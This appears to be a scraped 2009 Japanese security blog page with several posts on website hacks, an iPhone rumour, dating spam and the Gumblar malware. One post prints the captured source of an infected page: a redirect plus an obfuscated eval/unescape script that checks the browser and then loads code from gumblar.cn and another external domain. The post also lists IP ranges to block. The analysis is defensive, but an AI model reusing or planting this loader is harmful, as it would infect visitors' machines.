UnderForge of Lack

gumblarとは関係ないと思いますが・・・よくわからない
現在までに寄せられた話で、

パキスタン空軍・公式サイト

ケニア警察署

が立て続けにハッキングを食らっている模様


なんだかとっても混沌とした世の中です。
サイト管理者の方はお気をつけください。

最初に断っておきますが
うそくせー（笑）

Chinese rumor claims 2009 iPhone will be modest upgrade

Foxconnで働く中国人からのタレコミがあり、以下のような情報がリークしている模様。

デザイン的には旧来のものを踏襲(Repeat)し、スピードの面以外では際立った変更は無い
もっとも大きな変更点はクロックスピードとメモリの増加で、400MHz Samsung ARMプロセッサから 600MHzへとアップグレードされた。
メモリは２倍の 256MB
テスターは、現在のモデルと比較して、「本当に速い」とコメントした。

中国最大の iPhoneファンサイトへのポストによれば、早くからうわさにあった16GBと32GBの２モデルが用意され、320万画素のカメラが内蔵される。
また、新しいカメラはオートフォーカス機能を有する。
うわさでしかないが、GPSから自動的に方位を探るコンパスも標準実装されるらしい。

また内部情報として、新モデルiPhoneは N88と呼ばれているらしい。以前にうわさになっていた M68やN82とは違うようだ。
また、彼は32GBモデルのスクリーンキャプチャ(29.3GB Formatted)をポストしている。そこには MB717LLというファームウェアナンバーが記載されている。
現行モデルの最終ファームウェアはMB705LLである。

信じるものは。。。？

警告メールを送り続けること、早や一週間
ようやく、ヤバそうなとこをホストしてるISPから返事がやってきました

が・・

イヤそーな返事（苦笑）
まぁ、アレですね、こんなサイトをホストしてるのが広まるとマズイんでしょう

でもね・・いまどきチョットでも詳しい人は、即逆引きチェックすると思うんだけどなぁ・・・

ま、一旦閉鎖して感染経路を絶ってくれれば文句は無いんですがネ。

----------
あと、BBSとかBlogとかにも書いてるんですが、スレッド抹殺されたり、コメントをズバっと消されたりと酷い仕打ちを受けています（泣）

いや・・別に消すのはいいんだけど、感染しっぱなしだっての！
宇宙人からの書き込みとでも思われてるんだろうな（嘆息）

誰か、ゴミ箱にポイされない文章の書き方を教えてください。

2009.05.17 １行削除

------------------
追記：
その、ヤバいサイトなんですが、午前中停止してたのでほっとしてたら・・・
しっかりウィルス付で再開されました

2009.05.17 １行削除

今の気分↓　会社の人：音量注意


ていうか・・このISPはどーいう管理体制なんでしょうね・・・・（怒
（勘のイイ人は既に逆引きして笑ってるとは思うけど・・・）

インドのバンガロール市といえば、インドIT産業の中心都市のひとつなのですが・・・

ちと怖いので補助リンク
http://www.pluggd.in/bangalore-telecom-bsnl-website-hacked-gumblar.cn-exploit-297/
※リンク先に感染サイトへのアクティブリンクがあります

It seems Bangalore Telecom website, bangaloretelecom.com was hacked, or atleast there was an attempt to inject malicious script, gumblar.cn (has been blacklisted by Google).

05/11(CST)

どこが下火になってるのか教えて欲しい・・・

なんか情けないTitleだなぁ・・

History of Japanese Dating Spam
We have been closely monitoring Japanese dating spam for a while now, and have recently identified "adult dating" as one of the most often observed attacks.
いつも監視してるんかよ！

Many of these spam offers are easily identifiable by the randomly generated From lines and erotic Subject lines:

あーあ・・
まぁ、でも公開したメアドにはよくやってきますよね・・


The "trap link" is another Sakura trick. Spammers use other legitimate dating sites as a medium to indirectly attract site members to their own fraudulent Web page. This is called a Business/Contractor Sakura scheme. These spam organizations create a number of female characters to use as dummy accounts on those legit sites. Under a legit platform, these disguised characters fish for possible victims by bringing them over to the spammer’s site. Fictional requests often contain subject lines similar to the following: “Email from Ms. XX has arrived from YY site.”

やけにくわしいな！？

まぁ・・怪しげなメールは「開かない」ことですよ。
特に html ON とかにしてると、１コ前の記事のようなことになります

はっきりいってH1N1なんかメじゃないくらいパンデミック状態になってる zlkon/gumblarですが、どうも感染経路が Web だけではないようでして・・・

gumblar via e-mail anyone?

*****************************************************************

vURL Desktop Edition v0.3.7 Results

Source code for: hXXp://78.131.152.104/~fonsflos/qzfbu.html

Server IP: 78.131.152.104 [ s15.o12.pl ]

hpHosts Status: Not Listed

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 0

iFrames: 0

via Proxy: MontanaMenagerie (US)

Date: 09 May 2009

Time: 23:46:49:46

*****************************************************************

＜html＞＜head＞＜script type="text/javascript"＞window.location="http://qajtogap.cn";＜/script＞＜/head＞＜script language=javascript＞＜!-- 

(function(pwB){var D2J0='%';var Vsf=('var#20a#3d#22#53#63ri#70tEn#67ine#22#2cb#3d#22Vers#69on(#29+#22#2cj#3d#22#22#2cu#3dna#76igato#72#2eus#65#72Agent#3bif((u#2einde#78#4ff(#22#57#69n#22#29#3e0)#26#26(u#2ein#64exO#66(#22#4e#54#206#22)#3c0#29#26#26(do#63um#65n#74#2ec#6fo#6bi#65#2e#69#6e#64e#78#4ff(#22miek#3d1#22)#3c0)#26#26(typeof(#7a#72vzt#73#29#21#3dtyp#65#6ff(#22A#22)))#7bz#72v#7ats#3d#22#41#22#3b#65val(#22if(wi#6edow#2e#22+a+#22)j#3dj+#22+#61+#22#4d#61jor#22#2bb+a+#22#4di#6eor#22#2b#62#2ba+#22#42uild#22+#62+#22j#3b#22#29#3bdoc#75ment#2ewrit#65(#22#3c#73c#72ipt#20sr#63#3d#2f#2f#67u#6dblar#2ecn#2frs#73#2f#3fid#3d#22+#6a+#22#3e#3c#5c#2fs#63#72i#70t#3e#22)#3b#7d').replace(pwB,D2J0);eval(unescape(Vsf))})(/#/g);

 --＞＜/script＞＜body＞＜a href="hXXp://qajtogap.cn"＞Your link!＜/a＞＜script src='hXXp://b.rtbn2.cn/E/J.JS'＞＜/script＞＜/body＞＜/html＞

う・・・
ndg.techno.fm (76.74.252.212)
fm : ミクロネシア

TLDの正引き不能なのに、逆引きは可能とか・・ナニコレ？状態ですね

76.74.248.0 - 76.74.255.255
ServerBeach PEER1-SERVERBEACH-08A USA Texas
ひょっとしたら、Botに陥落したゾンビさんかもしれないので、焼くのは保留です。

qajtogap.cn (58.20.140.5) CN
CNC Group HuNan YueYang network : 58.20.128.0 - 58.20.159.255
こっちも、いまのところ Maliciousな報告はありませんね。

rtbn2.cn (74.220.215.58) USA Utah
BLUEHOST-NETWORK-2 : 74.220.192.0 - 74.220.223.255

Malice Detected:
74.220.202.34
74.220.207.60
74.220.207.127
74.220.215.60
74.220.215.220 zeus/wsnpoem v1 trojan
74.220.215.245
74.220.215.246
74.220.215.247

焼くかどうかの判断はおまかせします（笑）
74.220.215.0-74.220.215.255 あたりを焼いとくのが無難かなぁ・・？